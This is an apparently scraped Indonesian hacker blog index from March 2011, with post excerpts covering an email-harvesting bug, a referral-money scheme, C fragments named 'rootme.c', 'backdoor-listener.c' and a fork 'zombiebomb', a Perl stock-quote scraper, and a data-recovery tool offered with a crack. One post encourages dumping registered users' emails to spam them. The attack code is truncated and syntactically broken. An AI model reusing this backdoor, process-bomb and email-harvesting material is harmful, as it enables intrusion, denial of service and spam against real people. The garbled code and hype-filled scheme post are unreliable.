
26 March 2011

Error On <= maklum masih beta

Pertama² coba register ke

setelah register lakukan login tanpa melalui aktivasi dengan kata lain kita bisa memasukkan sembarang email (email fiktif)

setelah login kita akan diarahkan ke halaman

copy paste script ini ke url browser anda
copy  dan paste kan script ini ke browser anda pada halaman

taddddddda apa yang terjadi ???
semua list email user yang register pada website akan terlihat dengan jelas

So....catat semua alamat emailnya dan kirimi spam yang banyak biar serrrrruuuuuuuuuu..........wkwkkwkwkwkwkkk

sekilas tampilan dari error tersebut :
Baca Selengkapnya... Error On <= maklum masih beta

15 March 2011

I will teach you who to make money on KUDOS FOR FREE!! PER 1 REFERRAL YOU GET 25$!!!

Can i join?
  • Yes, Kudos is Open World Wide.

What are the requirements?
  • Complete an offer (free or paid)
  • Verified PayPal Account.

Is this a Scam?
  • Nope! It's 100% legit.
  • And this is how it work.
  1. Register at Kudos network.
  2. Complete an offer.
  3. Refer your friends and each of them complete an offer too.
  4. The companies you and your friends completed offers pays Kudos Network and that money is used to buy your GIFT or receive it as $,£,€ on your PayPal.

Do you need Proof?
Just see the testimonials they are for real.... I already got paid once 51£.

But as always there is a problem...

And the problem is... WTF??? Why did I only discovered this site now? -.-...

Do you want to receive your money? Just request it sending one mail to me! ;) and I will pay u! ;) 
Please after that leave a testimonial...
Baca Selengkapnya... I will teach you who to make money on KUDOS FOR FREE!! PER 1 REFERRAL YOU GET 25$!!!

rootme.c <= untested (masih ngantuk coyyyyy)


int main(int argc, char *argv[]) {

 if (argc < 4) {
  fprintf(stderr, "%s:   \n", argv[0]);

  char *user = argv[1];
  char *group = argv[2];
  char *file = argv[3];
  char buf[200];

  stdout = freopen(file, "a", stdout);

  /* set gid if necessary */
  if (group) {
   struct group *gr;

   if ((gr = getgrnam(group)) == NULL) {
    fprintf(stderr, "no such group %s - aborted", group);

   if (setgid(gr->gr_gid) || setegid(gr->gr_gid)) {
    fprintf(stderr, "setgid: %s - aborted", strerror(errno));

  /* set uid if necessary */
  if (user) {
   struct passwd *pw;

   if ((pw = getpwnam(user)) == NULL) {
    fprintf(stderr, "no such user %s - aborted", user);
   if (setuid(pw->pw_uid) || seteuid(pw->pw_uid)) {
    fprintf(stderr, "setuid: %s - aborted", strerror(errno));

  fprintf(stderr, "now go erase the file '%s', 

  recreate it as root:root and press enter\n", file);
  fgets(buf, sizeof(buf), stdin);

  stdout = freopen(file, "a", stdout);
  if (stdout == NULL) {
  fprintf(stdout, "jama\n");

Baca Selengkapnya... rootme.c <= untested (masih ngantuk coyyyyy)



int main() {
int fd;
struct sockaddr_in sa;
int port = 9994;

    if ((fd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {

 memset((char *) &sa, 0, sizeof(sa));
 sa.sin_family = AF_INET;
 sa.sin_addr.s_addr = htonl(INADDR_ANY);
 sa.sin_port = htons(port);

 if (bind(fd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
 if (listen(fd, 1) == -1) {
 fprintf(stderr, "done binding\n");
Baca Selengkapnya... backdoor-listener.c


* 23:30:37 @d4wfl1n> /bin/sh -c 'echo -n kill -STOP $$ \; ; echo -n sleep 1\; ; sleep 1000 &  echo kill -KILL $! ; echo ; echo ; sleep 1000'  | sh -x

int main(int argc, char *argv[]) {
 int i, c = (argc > 1 ? atoi(argv[1]) : 1024);

 printf("will create %d zombies. press  or \n", c);

 printf("creating %d zombies\n");
 for (i = 0; i < c; i++) {
  if (fork() == 0) {

 printf("Press  to exit and let shell reap them\n", c);
Baca Selengkapnya... zombiebomb.c

14 March 2011


use strict;
use warnings;

use LWP::UserAgent;
use Getopt::Long;
use File::Slurp;
use Term::ANSIColor;
use Env;

my $script_version = '0.3.4';

# Set the main folder which contains all the saved data.

my $main_folder = "$HOME/.brokyplo/";

# This variable will contain the name of the company, for example
# Google Inc, Apple Inc, etc. $company_name_parsed will contain
# instead the full name of the company, parsed by a regexp.
# $company_description_parsed, is used when the option --info is called;
# It will contain all the information of the company.

my $company_name               = '';
my $company_name_parsed        = '';
my $company_description_parsed = '';

# $price_to_color, will be used in the sub function color_price() at the
# line 342, to color the name of the stock market quotes (in order to
# make it more readable data visualization). $file_content will be used
# instead, to contain the content of the file dot brk saved.

my $price_to_color = '';
my $file_content   = '';

# The following group of scalars belong, to the function GetOptions().
# Each of them is used for the parameter which will be passed from
# command line.

my $parameter_show_info;
my $parameter_delete_item;
my $parameter_save_item;
my $parameter_read_item;
my $parameter_cleans_folder;
my $parameter_help;

# LWP::UserAgent scalars, which will compose the requests and the
# responses. At the end the $lwp_content will contain the page content.

my ( $lwp_useragent, $lwp_response, $lwp_content ) = ( '', '', '' );

# The following scalars, will be used to record the precise time when
# the stock quotes are saved in the database.

my $log_minutes = (localtime)[1];
my $log_hours   = (localtime)[2];
my $log_day     = (localtime)[3];
my $log_month   = (localtime)[4];
my $log_year    = 1900 + (localtime)[5];

# $price_id and $price_ch, will contain the information to show
# if the currency is in decline or is on the rise.

my ( $price_id, $price_ch ) = ( '', '' );


# This vector will be used to show all the information on the
# stock quotes, during the final iteration.

my @regular_expression_keys = (
    'Range',   '52 week', 'Open',      'Vol / Avg.',
    'Mkt cap', 'P/E',     'Div/yield', 'EPS',
    'Shares',  'Beta',    'Inst. own',

# @regular_expression_values, will contain the regexp to parse in the
# final iteration except the value eleven.

my @regular_expression_values = (
'52 week
'Vol / Avg.
'Mkt cap
'Inst. own

(.*?) <', ); # Creates the main directory which will contain all the file dot brk. # The file dot brk will contain expecially the stock quotes info # existing in the @regular_expression_keys and catched by # @regular_expression_values. mkdir "$HOME/.brokyplo" unless ( -d $main_folder ); GetOptions( 'help' => \$parameter_help, 'info' => \$parameter_show_info, 'remove' => \$parameter_delete_item, 'read' => \$parameter_read_item, 'save' => \$parameter_save_item, 'clear' => \$parameter_cleans_folder, ); if ( defined($parameter_help) ) { print color('green'), q { Brokyplo }, color('reset'), $script_version, q { Usage: perl }, $0, q { [--options] --info: show information about a company; --save: save the reasults in the main folder; --read: read a company saved in the past; --remove: remove a specific company from the database; --clear: clear the main directory which contains the stock quotes; --help: show this help. SEE THE PERLDOC (perldoc }, $0, q {) FOR MORE INFORMATION }; exit; } if ( defined($parameter_cleans_folder) ) { if ( -d $main_folder ) { opendir $DIRHANDLE, $main_folder or die "Can't open the directory: $!\n"; while ( glob( $main_folder . '*' ) ) { $FILEHANDLE = glob( $main_folder . '*' ); unlink $FILEHANDLE; } close $DIRHANDLE; die "\n", color('green'), 'Stock quotes successfully removed!', color('reset'), "\n\n"; } else { die "\n", color('red'), 'Main directory doesn\'t exists!', color('reset'), "\n\n"; } } # Asks the company name via INPUT and makes lowercase # characters in input. do { print q { , , )\\___/( \{(@)v(@)\} \{|~~~|\} \{|~~~|\} \{/^^^\\\} =======`m-m`====\ Please enter the company name: }; chomp( $company_name = <> ); } while ( $company_name eq '' ); $company_name = lc($company_name); # Checks if the user wants to read or remove something from the database read_database($company_name) if ( defined($parameter_read_item) ); remove_database($company_name) if ( defined($parameter_delete_item) ); $lwp_useragent = LWP::UserAgent->new; $lwp_useragent->agent('Mozilla/5.0'); $lwp_response = $lwp_useragent->get( '' . $company_name ); die "\n", color('red'), 'Error during extablishing the connection with the remote host...', color('reset'), "\n\n" unless ( $lwp_response->is_success ); $lwp_content = $lwp_response->content; # Checks if company exists in the Google Finance database die "\n", color('red'), 'Company name doesn\'t exists', color('reset'), ', please be more precise...', "\n\n" if ( $lwp_content =~ m{produced no matches}i or $lwp_content =~ m{Results 1}i ); # Starts parsing the company name and prints the results. if ( $lwp_content =~ m{class="g-unit g-first">


}i ) { $company_name_parsed = $1; print "\n", $company_name_parsed, ' '; } print $1, "\n\n" if ( $lwp_content =~ m{(.*?)  }i ); # Checks if the user just wants to view the information about the company # if true, is called the sub function show_info() on the line 299. if ( defined($parameter_show_info) ) { show_info($1) if ( $lwp_content =~ m{$regular_expression_values[11]}i ); } # Starts parsing the price and the currency. Well, honestly I don't like # so much this kind of solution... but I had to do it! If you have any # advices about this block of code let me know! $price_id = $1 if ( $lwp_content =~ m{}i ); $price_ch = $1 if ( $lwp_content =~ m{ print 'Price: ', $1, ' ' if ( $lwp_content =~ m{(.*?)}i ); print color_price( $1, $price_ch ), ' ' if ( $lwp_content =~ m{(.*?)}i ); print color_price( $1, $price_ch ), "\n\n" if ( $lwp_content =~ m{(.*?)}i ); # Checks if the user wants to save the statistics in the database. The # statistics files will be saved in dot brk. if ( defined($parameter_save_item) ) { open $FILEHANDLE, '>>', $main_folder . $company_name . '.brk' or die "Can't open file handle: $!\n"; # Checks if the file doesn't contains the banner, if true, writes the # banner with the program version and the full company name. $file_content = read_file( $main_folder . $company_name . '.brk' ); print {$FILEHANDLE} "\n", 'Brokyplo version: ', $script_version, "\n\n", 'Company name: ', $company_name_parsed, "\n" if ( $file_content !~ m{Brokyplo version:}i ); print {$FILEHANDLE} "\n", '---', $log_hours, ':', $log_minutes, '---', $log_month, '/', $log_day, '/', $log_year, '---', "\n\n"; } # Parse the rest of the body of the Google Finance page and shows the # various information about the stock quotes. $lwp_content =~ s/\*/\*/g if ( $lwp_content =~ m{\*}i ); $lwp_content =~ s/    -/-/g; for my $index ( 0 .. 10 ) { if ( $lwp_content =~ m{$regular_expression_values[$index]}i ) { defined($parameter_save_item) ? print {$FILEHANDLE} $regular_expression_keys[$index], ': ', $1, "\n" : print $regular_expression_keys[$index], ': ', color('blue'), $1, color('reset'), "\n"; } } # Makes the final check, to control if the file was successfully saved, # and closes the file-handle. if ( defined($parameter_save_item) ) { print 'Stock quotes for ', color('blue'), $company_name_parsed, color('reset'), ' successfully saved!', "\n\n" if ( -e $main_folder . $company_name . '.brk' ); close $FILEHANDLE; } # Various sub functions sub show_info { $company_description_parsed = shift; print $company_description_parsed, "\n\n"; exit; } sub remove_database { $company_name = shift; if ( -e $main_folder . $company_name . '.brk' ) { unlink( $main_folder . $company_name . '.brk' ); print "\n", color('blue'), $company_name, color('reset'), color('green'), '.brk, successfully removed from database!', color('reset'), "\n\n"; exit; } else { die "\n", color('red'), 'The company doesn\'t exists in the database!', color('reset'), "\n\n"; } } sub read_database { $company_name = shift; if ( -e $main_folder . $company_name . '.brk' ) { print read_file( $main_folder . $company_name . '.brk' ), "\n"; exit; } else { die "\n", color('red'), 'The company doesn\'t exists in the database!', color('reset'), "\n\n"; } } sub color_price { $price_to_color = shift; $price_ch = shift; $price_ch eq 'chg' ? return color('green'), $price_to_color, color('reset') : return color('red'), $price_to_color, color('reset'); } __END__ =head1 NAME Brokyplo =head1 SYNOPSIS perl [--options] --info: show information about a company; --save: save the reasults in the main folder; --read: read a company saved in the past; --remove: remove a specific company from the database; --clear: clear the main directory which contains the stock quotes; --help: show this help. =head1 EXAMPLES Please enter the company name: Google Google Inc. (Public, NASDAQ:GOOG) Price: 600.62 -8.94 (-1.47%) Stock quotes for Google Inc. successfully saved! =head1 DESCRIPTION Thanks to Google Finance, (, Brokyplo, can parse some of the information of a company for example the stock quotes, the currency and something else, and save it on a flat database. This script works without any graphic interface, but only from a command line, perfect for minimal desktop environments. If you want, you can save something in the main folder, you can also remove these files saved as dot brk, or read them simply from the command line with the relative ARGV options. =head1 SEE ALSO Env ~ Getopt::Long ~ LWP::UserAgent ~ File::Slurp ~ See the FAQ about Term modules at =head1 COPYRIGHT Copyright (C) 2010 by sysxash This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. On Debian systems, the complete text of the GNU General Public License can be found in /usr/share/common-licenses/GPL-3. =head1 AUTHOR sysxash with his mind - =head1 THANKS Thanks to irc channel @ =cut
Baca Selengkapnya...

Penetration Testing Biometric System

Untuk penjelasan mengenai skema dan proses kerjanya bisa didownload di sini
Baca Selengkapnya... Penetration Testing Biometric System

13 March 2011

Mengembalikan Data Yang Terhapus Dengan Steller Phoenix Windows Data Recovery

Setelah banyak software yang dibahas tentang bagaimana cara mengembalikan data yang terhapus atau hilang dari harddisk dan berbagai macam media penyimpanan lainnya. Dalam artikel kali ini akan dibahas utility yang menarik dari software-software recovery sebelumnya, Stellar Phoenix Windows Data Recovery salah satu utility yang dapat mengembalikan file tanpa merusak file tersebut.

Stellar Phoenix Windows Data Recovery bekerja dengan mengambil informasi data yang hilang pada file system FAT maupun NTFS. Selain itu pula software yang satu ini juga dapat melakukan recovery terhadap partisi yang korup atau rusak. Recovery mail, disk cloning recovery RAW dari CD dan USB.

Pada versi juga mendukung system file seperti FAT32, VFAT, NTFS dan NTFS5. Selain itu pada versi ini juga mendukung system operasi Windows Vista dan Seven. Software ini dapat bekerja dua kali lipat dari kecepatan software-software lain yang sejenis. Berikut fitur lengkap :

1. Quick Recovery, software ini mampu melakukan recovery dengan cepat tanpa merusak file.
2. Deleted File Recovery, mengembalikan file dari partisi yang anda pilih.
3. Formatted / Lost File and Folder Recovery, mengembalikan semua data dari semua partisi yang ada.
4. Search Lost Volume, mengembalikan partisi yang hilang.

Fasilitas Disk Cloning, dengan fasilitas ini, Anda dapat membuat replika dari konten hard drive Anda. Hal ini dilakukan untuk mem-backup Sistem Operasi. Stellar Phoenix Windows data Recovery merupakan jawaban bagi sobat atas kehilangan data pada harddisk.

Download Software trial free di sini dan pacth
Baca Selengkapnya... Mengembalikan Data Yang Terhapus Dengan Steller Phoenix Windows Data Recovery